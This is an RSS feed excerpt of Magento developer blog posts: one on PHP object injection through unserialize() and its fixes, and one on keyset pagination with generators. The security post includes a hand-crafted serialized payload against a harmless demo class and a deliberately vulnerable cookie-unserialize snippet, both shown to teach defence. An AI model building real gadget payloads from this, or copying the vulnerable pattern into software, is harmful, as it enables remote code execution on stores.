&lt;p&gt;"It got slow after we added extensions" is true on almost every long-lived Magento store. The mistake is treating the fix as folklore. The cost of every plugin, observer, layout handle, and query is observable. Turn on the profiler, read what's attached, measure one module at a time, and you trade a week of guessing for an afternoon of evidence.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>performance</category>
      <category>php</category>
    </item>
    <item>
      <title>unserialize() is the Magento footgun nobody audits</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Mon, 15 Jun 2026 08:13:03 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/unserialize-is-the-magento-footgun-nobody-audits-b5i</link>
      <guid>https://dev.to/iamrobindhiman/unserialize-is-the-magento-footgun-nobody-audits-b5i</guid>
      <description>&lt;p&gt;Every few months the same Magento story runs again: a store is compromised, and it wasn't core. It was a third-party extension — usually something installed for &lt;em&gt;speed&lt;/em&gt;, like a full-page-cache warmer or an import tool. The root cause underneath most of them is the same one PHP developers have been shipping by accident for fifteen years: object injection through &lt;code&gt;unserialize()&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;It's worth understanding properly, because once you see the shape of it you'll spot it in code review in about three seconds.&lt;/p&gt;

&lt;h2&gt;
  
  
  How a string becomes a shell
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;unserialize()&lt;/code&gt; doesn't just rebuild arrays and strings. It rebuilds &lt;em&gt;objects&lt;/em&gt; — it will instantiate any class the calling code has access to and populate its properties, straight from the input string. If an attacker controls that string, they control which objects come into existence and what's inside them.&lt;/p&gt;

&lt;p&gt;On its own, a stray object is harmless. The danger is PHP's magic methods. When an object is destroyed, &lt;code&gt;__destruct()&lt;/code&gt; runs. When it wakes from unserialisation, &lt;code&gt;__wakeup()&lt;/code&gt; runs. In a codebase the size of Magento — core plus framework plus thirty extensions plus their dependencies — there is almost always &lt;em&gt;some&lt;/em&gt; class whose &lt;code&gt;__destruct()&lt;/code&gt; writes a file, or whose &lt;code&gt;__wakeup()&lt;/code&gt; opens a connection, or that can be chained into something that does. Attackers call these gadget chains. They don't need your code to be careless; they need your code to be &lt;em&gt;large&lt;/em&gt;, and to call &lt;code&gt;unserialize()&lt;/code&gt; on something they can reach.&lt;/p&gt;

&lt;p&gt;So the whole exploit reduces to one question: is there a path where untrusted input — a cookie, a request parameter, a cache key, an imported file — reaches an &lt;code&gt;unserialize()&lt;/code&gt; call?&lt;/p&gt;
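
&lt;p&gt;Here is a harmless sketch of the mechanism. &lt;code&gt;TempFileCleaner&lt;/code&gt; is a made-up class standing in for a gadget, and its destructor only prints. The payload is typed by hand, which is the point: nobody ever serialized this object:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;?php
declare(strict_types=1);

// Hypothetical "gadget": a class whose destructor has a side effect.
final class TempFileCleaner
{
    public string $path = '';

    public function __destruct()
    {
        // A real gadget might delete or write this path; this one only prints.
        echo "destructor ran for {$this-&gt;path}", PHP_EOL;
    }
}

// A string an attacker could write by hand.
$payload = 'O:15:"TempFileCleaner":1:{s:4:"path";s:11:"/etc/passwd";}';

$object = unserialize($payload); // instantiates the class and fills $path
unset($object);                  // destructor fires with attacker-chosen data
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The constructor never runs and no application code touches the object, yet the destructor still executes with a value taken from the string.&lt;/p&gt;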

&lt;h2&gt;
  
  
  Why Magento extensions are fertile ground
&lt;/h2&gt;

&lt;p&gt;Two reasons. First, history: Magento leaned on PHP serialization for years — cache entries, config, sessions — so reaching for &lt;code&gt;serialize()&lt;/code&gt;/&lt;code&gt;unserialize()&lt;/code&gt; is muscle memory for a lot of extension developers. Second, the install base: performance and cache extensions, by their nature, read and write serialized blobs constantly, and they run early in the request before much validation has happened. That's exactly the combination you don't want around a deserialization call.&lt;/p&gt;

&lt;p&gt;A minimal version of the bug looks this innocent:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="c1"&gt;// Don't do this.&lt;/span&gt;
&lt;span class="nv"&gt;$payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$request&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;getCookie&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'warmer_state'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nv"&gt;$state&lt;/span&gt;   &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;unserialize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$payload&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="c1"&gt;// attacker controls $payload&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No exotic mistake. Just &lt;code&gt;unserialize()&lt;/code&gt; pointed at something a visitor can set.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix is boring, which is the point
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Don't pass untrusted data through PHP's serializer at all.&lt;/strong&gt; Use JSON. It only carries data (arrays, strings, numbers), never objects, so there are no magic methods to trigger:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;json_decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In Magento 2 specifically, that's exactly what &lt;code&gt;Magento\Framework\Serialize\Serializer\Json&lt;/code&gt; is for. Inject &lt;code&gt;SerializerInterface&lt;/code&gt; and let it do the work — Magento deprecated raw &lt;code&gt;serialize()&lt;/code&gt;/&lt;code&gt;unserialize()&lt;/code&gt; in core for this reason years ago.&lt;/p&gt;

&lt;p&gt;If you genuinely must unserialize PHP-native data, PHP 7+ lets you slam the door on objects:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$state&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;unserialize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$payload&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'allowed_classes'&lt;/span&gt; &lt;span class="o"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That turns any embedded object into a &lt;code&gt;__PHP_Incomplete_Class&lt;/code&gt; instead of instantiating it — no gadget chain, no &lt;code&gt;__destruct()&lt;/code&gt; surprise. And if the payload crosses a trust boundary, sign it (HMAC) and verify before you even look at it.&lt;/p&gt;
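
&lt;p&gt;A minimal sketch of the sign-then-verify step, assuming a JSON payload carried in a cookie. &lt;code&gt;STATE_KEY&lt;/code&gt;, &lt;code&gt;signState()&lt;/code&gt; and &lt;code&gt;readState()&lt;/code&gt; are names I made up for the example, and a real module would load the secret from secure configuration rather than a constant:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;?php
declare(strict_types=1);

// Hypothetical secret, hard-coded only to keep the sketch self-contained.
const STATE_KEY = 'replace-with-a-long-random-secret';

function signState(array $state): string
{
    $json = json_encode($state, JSON_THROW_ON_ERROR);
    $mac = hash_hmac('sha256', $json, STATE_KEY);

    return base64_encode($json) . '.' . $mac;
}

function readState(string $cookie): ?array
{
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    [$encoded, $mac] = $parts;

    $json = base64_decode($encoded, true);
    if ($json === false) {
        return null;
    }

    // Constant-time comparison, done before the payload is decoded.
    if (!hash_equals(hash_hmac('sha256', $json, STATE_KEY), $mac)) {
        return null;
    }

    $state = json_decode($json, true);

    return is_array($state) ? $state : null;
}

$cookie = signState(['page' =&gt; 3]);
var_dump(readState($cookie) === ['page' =&gt; 3]); // bool(true)
var_dump(readState($cookie . '0') === null);     // bool(true): signature no longer matches
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The order matters: the signature is checked on the raw bytes first, and only a verified payload reaches the decoder.&lt;/p&gt;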

&lt;h2&gt;
  
  
  Auditing your own store
&lt;/h2&gt;

&lt;p&gt;You can find most of this yourself in a minute:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-rn&lt;/span&gt; &lt;span class="s2"&gt;"unserialize("&lt;/span&gt; vendor/ app/code/ &lt;span class="se"&gt;\&lt;/span&gt;
  | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-v&lt;/span&gt; &lt;span class="s2"&gt;"allowed_classes"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Read every hit. For each one, ask the only question that matters: &lt;em&gt;can a user influence what reaches this call?&lt;/em&gt; Start with extensions that touch caching, sessions, import/export, and anything that reads cookies — that's where the live ones hide.&lt;/p&gt;

&lt;h2&gt;
  
  
  The wider point
&lt;/h2&gt;

&lt;p&gt;None of this is really Magento's fault, and none of it is new. PHP object injection is a whole vulnerability class; Java has its own deserialization nightmare, Python has pickle, Ruby has its Marshal bugs. The lesson generalises cleanly: &lt;strong&gt;deserialising attacker-controlled data into rich objects is remote code execution waiting for a gadget.&lt;/strong&gt; Treat any &lt;code&gt;unserialize()&lt;/code&gt; (or &lt;code&gt;pickle.loads&lt;/code&gt;, or &lt;code&gt;readObject&lt;/code&gt;) on untrusted input as a live wire.&lt;/p&gt;

&lt;p&gt;For Magento specifically, the uncomfortable part is that the dangerous code usually isn't yours. It rides in on an extension you installed to make the store &lt;em&gt;faster&lt;/em&gt;. Your perfectly tuned cache layer is worth nothing if it hands an attacker a shell — so the next time you &lt;code&gt;composer require&lt;/code&gt; a performance module, grep it before you trust it.&lt;/p&gt;

</description>
      <category>magento2</category>
      <category>php</category>
      <category>security</category>
    </item>
    <item>
      <title>Paginating Magento catalogs without OFFSET</title>
      <dc:creator>Robin Dhiman</dc:creator>
      <pubDate>Mon, 15 Jun 2026 08:13:00 +0000</pubDate>
      <link>https://dev.to/iamrobindhiman/paginating-magento-catalogs-without-offset-73d</link>
      <guid>https://dev.to/iamrobindhiman/paginating-magento-catalogs-without-offset-73d</guid>
      <description>&lt;p&gt;I was building a module that reads every product in a Magento catalog to generate an &lt;a href="https://llmstxt.org/" rel="noopener noreferrer"&gt;llms.txt&lt;/a&gt; file. On a store with 70,000 products, the standard Magento collection was fast at page 1 and unusably slow around page 40. The code did not change — only the page number.&lt;/p&gt;

&lt;p&gt;This is not specific to Magento. OFFSET pagination gets slower with page depth in every SQL database, and any ORM that exposes &lt;code&gt;LIMIT offset, n&lt;/code&gt; inherits the same curve — Laravel, Django, Rails, Hibernate, all of them. &lt;code&gt;setPageSize()&lt;/code&gt; and &lt;code&gt;setCurPage()&lt;/code&gt; are the standard Magento 2 way to iterate a collection, so the pattern shows up a lot in Magento code. This post is about the fix.&lt;/p&gt;

&lt;h2&gt;
  
  
  The standard way, and why it breaks
&lt;/h2&gt;

&lt;p&gt;In Magento 2, if you want to read every product, you usually write something like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="nv"&gt;$collection&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;collectionFactory&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;create&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;addAttributeToSelect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'*'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;setPageSize&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;setCurPage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$page&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Under the hood, &lt;code&gt;setPageSize&lt;/code&gt; and &lt;code&gt;setCurPage&lt;/code&gt; turn into SQL &lt;code&gt;LIMIT&lt;/code&gt; and &lt;code&gt;OFFSET&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;catalog_product_entity&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="k"&gt;ASC&lt;/span&gt;
&lt;span class="k"&gt;LIMIT&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt; &lt;span class="k"&gt;OFFSET&lt;/span&gt; &lt;span class="mi"&gt;999000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;MySQL reads this as: "start from row 1, skip 999,000 rows, then give me the next 1,000." The database has no shortcut. It walks the index from the start every single time.&lt;/p&gt;

&lt;p&gt;That is the slowdown. At page 1, &lt;code&gt;OFFSET 0&lt;/code&gt; is free. At page 1000, &lt;code&gt;OFFSET 999000&lt;/code&gt; is 999,000 wasted row reads &lt;em&gt;per request&lt;/em&gt;. The cost grows with the page number — and adds up if the same query runs many times.&lt;/p&gt;
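
&lt;p&gt;The cumulative cost is easy to underestimate, so here is the arithmetic as a short sketch. It assumes the 70,000-product catalog from the intro and a page size of 1,000, and it simply sums the offsets that a full export would ask MySQL to skip:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;?php
declare(strict_types=1);

$pageSize = 1000;
$totalRows = 70000;
$pages = intdiv($totalRows, $pageSize);

$skipped = 0;
for ($page = 1; $page &lt;= $pages; $page++) {
    // OFFSET for this page: rows read and thrown away before the page starts.
    $skipped += ($page - 1) * $pageSize;
}

echo "rows returned: $totalRows", PHP_EOL; // rows returned: 70000
echo "rows skipped:  $skipped", PHP_EOL;   // rows skipped:  2415000
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Roughly 2.4 million discarded rows to return 70,000. Double the catalog and the skipped total roughly quadruples.&lt;/p&gt;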

&lt;h2&gt;
  
  
  The fix, part one: keyset pagination
&lt;/h2&gt;

&lt;p&gt;Instead of using OFFSET, use the index you already have — the primary key — as a cursor:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;SELECT&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="k"&gt;FROM&lt;/span&gt; &lt;span class="n"&gt;catalog_product_entity&lt;/span&gt;
&lt;span class="k"&gt;WHERE&lt;/span&gt; &lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="n"&gt;lastId&lt;/span&gt;
&lt;span class="k"&gt;ORDER&lt;/span&gt; &lt;span class="k"&gt;BY&lt;/span&gt; &lt;span class="n"&gt;entity_id&lt;/span&gt; &lt;span class="k"&gt;ASC&lt;/span&gt;
&lt;span class="k"&gt;LIMIT&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This tells MySQL: "start from the row right after the last one I saw, and give me the next 1,000." It is an index range scan — the database jumps straight to the right spot through the B-tree. The cost is the same whether &lt;code&gt;:lastId&lt;/code&gt; is 0, 10,000, or 1,000,000.&lt;/p&gt;

&lt;p&gt;You pass the last &lt;code&gt;entity_id&lt;/code&gt; you saw into the next query as &lt;code&gt;:lastId&lt;/code&gt;. The cursor moves forward through the table without ever skipping rows.&lt;/p&gt;

&lt;p&gt;Other teams have written about large speedups from this switch on production tables. The point is not the exact number — it is that the cost no longer grows with page depth.&lt;/p&gt;

&lt;p&gt;Here is what it looks like in the module:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;buildProductSelect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nv"&gt;$storeId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nv"&gt;$lastId&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="kt"&gt;Select&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$select&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connection&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;select&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;from&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'catalog_product_entity'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;where&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'entity_id &amp;gt; ?'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$lastId&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;order&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'entity_id ASC'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;limit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="c1"&gt;// ... EAV joins, status filter, visibility filter, etc.&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nv"&gt;$select&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;WHERE entity_id &amp;gt; :lastId&lt;/code&gt; is the whole trick. Everything else is standard Magento code.&lt;/p&gt;

&lt;h2&gt;
  
  
  The fix, part two: PHP generators
&lt;/h2&gt;

&lt;p&gt;Keyset pagination solves the database side. But if you load 70,000 products into PHP arrays in one go, you have only moved the problem.&lt;/p&gt;

&lt;p&gt;This is where &lt;code&gt;yield&lt;/code&gt; helps. A PHP generator lets a function behave like an iterator — it hands back one batch at a time, pauses, and continues on the next call. Each batch can be freed from memory before the next one is fetched.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;private&lt;/span&gt; &lt;span class="k"&gt;function&lt;/span&gt; &lt;span class="n"&gt;getProductGenerator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nv"&gt;$storeId&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt; &lt;span class="kt"&gt;Generator&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nv"&gt;$lastId&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nv"&gt;$rows&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;connection&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;fetchAll&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;buildProductSelect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$storeId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$lastId&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;empty&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$rows&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="nv"&gt;$lastId&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;int&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="nb"&gt;end&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$rows&lt;/span&gt;&lt;span class="p"&gt;)[&lt;/span&gt;&lt;span class="s1"&gt;'entity_id'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

        &lt;span class="k"&gt;yield&lt;/span&gt; &lt;span class="nv"&gt;$rows&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;count&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$rows&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The caller reads it like any other iterable:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$this&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;getProductGenerator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$storeId&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$batch&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;foreach&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$batch&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nv"&gt;$row&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="c1"&gt;// process one product&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="c1"&gt;// $batch can be freed from memory here&lt;/span&gt;
    &lt;span class="c1"&gt;// before the next batch is fetched&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Memory per batch stays small — around 5–10 MB for 1,000 rows in my case. The database runs constant-cost range scans. The caller does not need to know how many products exist.&lt;/p&gt;

&lt;h2&gt;
  
  
  One honest caveat
&lt;/h2&gt;

&lt;p&gt;A generator keeps &lt;strong&gt;per-batch&lt;/strong&gt; memory bounded. But if you collect results into a string or a big array across batches, &lt;strong&gt;total&lt;/strong&gt; memory through the full loop still grows with catalog size — only the peak per fetch stays small.&lt;/p&gt;

&lt;p&gt;So the full picture:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Database side:&lt;/strong&gt; truly constant cost per page, no matter the page depth&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Per-batch PHP memory:&lt;/strong&gt; small and bounded&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Total memory through the full loop:&lt;/strong&gt; still grows with catalog size, unless you also stream the output to disk&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The first two are big wins on their own. Do not overstate the third.&lt;/p&gt;
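
&lt;p&gt;If the third one matters for your job, streaming is the usual answer: write each row out as you go instead of building one big string. A minimal sketch, where &lt;code&gt;fakeBatches()&lt;/code&gt; is a hypothetical stand-in for the product generator above and the output format is invented for the example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;?php
declare(strict_types=1);

/** Hypothetical stand-in for the product generator: yields batches of rows. */
function fakeBatches(): Generator
{
    yield [['entity_id' =&gt; 1, 'name' =&gt; 'Tent'], ['entity_id' =&gt; 2, 'name' =&gt; 'Stove']];
    yield [['entity_id' =&gt; 3, 'name' =&gt; 'Lantern']];
}

$path = tempnam(sys_get_temp_dir(), 'llms');
$handle = fopen($path, 'wb');

foreach (fakeBatches() as $batch) {
    foreach ($batch as $row) {
        // Write each line immediately instead of appending to a growing string.
        fwrite($handle, "- {$row['name']}\n");
    }
}

fclose($handle);

$written = file_get_contents($path);
unlink($path);
echo $written;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;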

&lt;h2&gt;
  
  
  When to actually use this
&lt;/h2&gt;

&lt;p&gt;Keyset pagination is the right default for any loop that:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Reads a large table from start to finish.&lt;/strong&gt; Catalog exports, data sync jobs, sitemap generation, search reindexing — anywhere the caller needs every row, not a slice.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runs in a background job, cron, or CLI.&lt;/strong&gt; The sequential nature of cursor pagination is fine when nothing downstream needs to jump to an arbitrary page.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Uses a primary key that is a number and always goes up.&lt;/strong&gt; Magento's &lt;code&gt;entity_id&lt;/code&gt; works this way — every new product gets a bigger ID than the last one, so &lt;code&gt;WHERE entity_id &amp;gt; :lastId&lt;/code&gt; always moves forward without skipping or repeating rows.&lt;/li&gt;
&lt;/ul&gt;

